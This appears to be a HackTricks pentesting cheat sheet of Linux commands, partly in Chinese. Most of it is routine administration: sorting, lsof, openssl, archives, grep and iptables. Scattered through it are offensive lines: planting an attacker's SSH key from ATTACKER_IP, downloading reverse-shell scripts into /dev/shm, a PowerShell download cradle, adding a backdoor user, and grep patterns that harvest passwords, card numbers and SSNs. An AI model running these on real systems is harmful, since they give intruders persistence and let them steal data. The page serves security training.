| .. | ||
| bypass-bash-restrictions.md | ||
| README.md | ||
有用的Linux命令
使用Trickest可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。 立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在HackTricks中看到您的公司广告吗?或者您想要访问PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks衣物
- 加入💬 Discord群组或电报群组或在Twitter上关注我🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。
常见的Bash命令
#Exfiltration using Base64
base64 -w 0 file
#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'
#Add public key to authorized keys
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
#Echo without new line and Hex
echo -n -e
#Count
wc -l <file> #Lines
wc -c #Chars
#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates
#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file
#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by networks processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80
#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz
#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker
#Clipboard
xclip -sel c < cat file.txt
#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
#Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob
#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd
# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101
# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz
#Count number of instructions executed by a program, need a host based linux (not working in VM)
perf stat -x, -e instructions:u "ls"
#Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezone
sudo dpkg-reconfigure tzdata
#Search from which package is a binary
apt-file search /usr/bin/file #Needed: apt-get install apt-file
#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html
echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw
#Set not removable bit
sudo chattr +i file.txt
sudo chattr -i file.txt #Remove the bit so you can delete it
# List files inside zip
7z l file.zip
使用Trickest可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。 立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
适用于Windows的Bash
#Base64 for Windows
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
#Exe compression
upx -9 nc.exe
#Exe2bat
wine exe2bat.exe nc.exe nc.txt
#Compile Windows python exploit to exe
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
#Compile for windows
#sudo apt-get install gcc-mingw-w64-i686
i686-mingw32msvc-gcc -o executable useradd.c
Greps
Grep is a powerful command-line tool used for searching text patterns in files. It is an essential tool for any Linux user and can be used in various scenarios. Here are some useful grep commands:
Basic Grep
The basic grep command syntax is as follows:
grep [options] pattern [file...]
patternis the text pattern you want to search for.fileis the file(s) you want to search in. If no file is specified, grep will search in standard input.
Here are some examples:
-
Search for a specific word in a file:
grep "word" file.txt -
Search for a pattern in multiple files:
grep "pattern" file1.txt file2.txt -
Search for a pattern in all files in a directory:
grep "pattern" *
Case-Insensitive Search
By default, grep performs a case-sensitive search. To perform a case-insensitive search, use the -i option:
grep -i "pattern" file.txt
Recursive Search
To search for a pattern in all files in a directory and its subdirectories, use the -r option:
grep -r "pattern" directory/
Invert Match
To search for lines that do not match a pattern, use the -v option:
grep -v "pattern" file.txt
Count Matches
To count the number of matches for a pattern, use the -c option:
grep -c "pattern" file.txt
Display Line Numbers
To display the line numbers along with the matching lines, use the -n option:
grep -n "pattern" file.txt
Regular Expressions
Grep supports regular expressions for more advanced pattern matching. Here are some examples:
-
Search for lines starting with a specific word:
grep "^word" file.txt -
Search for lines ending with a specific word:
grep "word$" file.txt -
Search for lines containing one of multiple patterns:
grep "pattern1\|pattern2" file.txt -
Search for lines containing a pattern with a specific number of repetitions:
grep "pattern\{3\}" file.txt
These are just a few examples of what you can do with grep. It is a versatile tool that can be combined with other commands to perform complex text processing tasks.
#Extract emails from file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt
#Extract valid IP addresses
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
#Extract passwords
grep -i "pwd\|passw" file.txt
#Extract users
grep -i "user\|invalid\|authentication\|login" file.txt
# Extract hashes
#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})
egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
#Extract valid MySQL-Old hashes
grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
#Extract blowfish hashes
grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
#Extract Joomla hashes
egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
#Extract VBulletin hashes
egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
#Extraxt phpBB3-MD5
egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
#Extract Wordpress-MD5
egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
#Extract Drupal 7
egrep -o '$S$S{52}' *.txt > drupal-7.txt
#Extract old Unix-md5
egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
#Extract md5-apr1
egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
#Extract sha512crypt, SHA512(Unix)
egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt
#Extract e-mails from text files
grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt
#Extract HTTP URLs from text files
grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
#For extracting HTTPS, FTP and other URL format use
grep -E '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]' *.txt > urls.txt
#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"
#Extract Floating point numbers
grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt
# Extract credit card data
#Visa
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
#MasterCard
grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
#American Express
grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
#Diners Club
grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
#Discover
grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
#JCB
grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt
#AMEX
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt
# Extract IDs
#Extract Social Security Number (SSN)
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
#Extract Indiana Driver License Number
grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt
#Extract US Passport Cards
grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt
#Extract US Passport Number
grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt
#Extract US Phone Numberss
grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt
#Extract ISBN Numbers
egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
Nmap搜索帮助
Nmap是一款功能强大的网络扫描工具,用于发现和评估网络上的主机和服务。以下是一些常用的Nmap搜索命令和选项的帮助信息:
-sn:使用Ping扫描模式,只检测主机是否在线。-sP:使用Ping扫描模式,检测主机是否在线,并列出在线主机的IP地址。-sS:使用TCP SYN扫描模式,探测主机上开放的TCP端口。-sU:使用UDP扫描模式,探测主机上开放的UDP端口。-p:指定要扫描的端口范围,例如-p 1-100表示扫描1到100之间的端口。-O:进行操作系统识别,尝试确定目标主机所使用的操作系统。-A:进行全面的扫描,包括端口扫描、操作系统识别和版本检测等。-v:显示详细的扫描结果。-oN:将扫描结果保存到指定的文件中。
请注意,使用Nmap进行网络扫描可能涉及到法律和道德问题。在进行任何扫描之前,请确保您已经获得了适当的授权,并遵守适用的法律和规定。
#Nmap scripts ((default or version) and smb))
nmap --script-help "(default or version) and *smb*"
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
nmap --script-help "(default or version) and smb)"
Bash
Bash(Bourne Again SHell)是一种流行的Unix shell和命令语言。它是Linux系统中默认的shell,也可以在其他Unix系统中使用。Bash提供了一个交互式的命令行界面,允许用户执行各种操作,包括文件管理、进程控制和系统配置。
基本命令
以下是一些常用的Bash命令:
ls:列出当前目录中的文件和文件夹。cd:切换到指定的目录。pwd:显示当前工作目录的路径。mkdir:创建一个新的目录。rm:删除文件或目录。cp:复制文件或目录。mv:移动文件或目录。cat:显示文件的内容。grep:在文件中搜索指定的模式。chmod:更改文件或目录的权限。chown:更改文件或目录的所有者。ps:显示当前运行的进程。kill:终止指定的进程。
管道和重定向
Bash还提供了管道和重定向功能,用于处理命令的输入和输出。
- 管道(
|):将一个命令的输出作为另一个命令的输入。例如,ls | grep .txt将列出当前目录中所有以.txt结尾的文件。 - 重定向:可以将命令的输出重定向到文件中,或者从文件中读取输入。例如,
ls > files.txt将将当前目录中的文件列表写入files.txt文件中。
脚本编写
Bash还可以用于编写脚本,以自动化一系列命令的执行。脚本是包含一系列命令的文本文件,可以通过运行脚本文件来执行其中的命令。
要编写一个Bash脚本,只需创建一个文本文件,并在文件的开头添加#!/bin/bash,然后在文件中编写要执行的命令。
例如,以下是一个简单的Bash脚本示例,用于列出当前目录中的所有文件:
#!/bin/bash
ls
要运行脚本,可以使用bash命令,后跟脚本文件的路径。例如,bash script.sh将运行名为script.sh的脚本文件。
总结
Bash是一种强大而灵活的命令行工具,可以帮助用户在Linux系统中执行各种任务。掌握基本的Bash命令和脚本编写技巧,将使您更加高效地使用Linux系统。
#All bytes inside a file (except 0x20 and 0x00)
for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
Iptables
Iptables is a powerful firewall utility for Linux systems. It allows you to configure and manage network traffic by creating rules and chains. With iptables, you can control incoming and outgoing traffic, filter packets based on various criteria, and set up network address translation (NAT).
Basic Usage
To view the current iptables rules, use the following command:
iptables -L
To flush all existing rules and chains, use the following command:
iptables -F
To block incoming traffic from a specific IP address, use the following command:
iptables -A INPUT -s <IP_ADDRESS> -j DROP
To allow incoming traffic on a specific port, use the following command:
iptables -A INPUT -p <PROTOCOL> --dport <PORT_NUMBER> -j ACCEPT
To save the current iptables rules to a file, use the following command:
iptables-save > <FILE_NAME>
Advanced Usage
In addition to the basic usage, iptables provides many advanced features and options. Here are a few examples:
-
Logging: You can log specific packets or events using the
LOGtarget. -
Connection Tracking: Iptables can track the state of network connections and apply rules based on the connection's state.
-
Port Forwarding: You can forward incoming traffic from one port to another using the
DNATtarget. -
Packet Manipulation: Iptables allows you to modify packet headers, change packet destinations, or alter packet contents.
For more information on iptables and its advanced usage, refer to the official documentation.
#Delete curent rules and chains
iptables --flush
iptables --delete-chain
#allow loopback
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
#drop ICMP
iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP
iptables -A OUTPUT -p icmp -j DROP
#allow established connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
#allow ssh, http, https, dns
iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT
#default policies
iptables -P INPUT DROP
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥
- 你在一家网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品- The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入 💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
使用Trickest可以轻松构建和自动化工作流程,使用全球最先进的社区工具。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}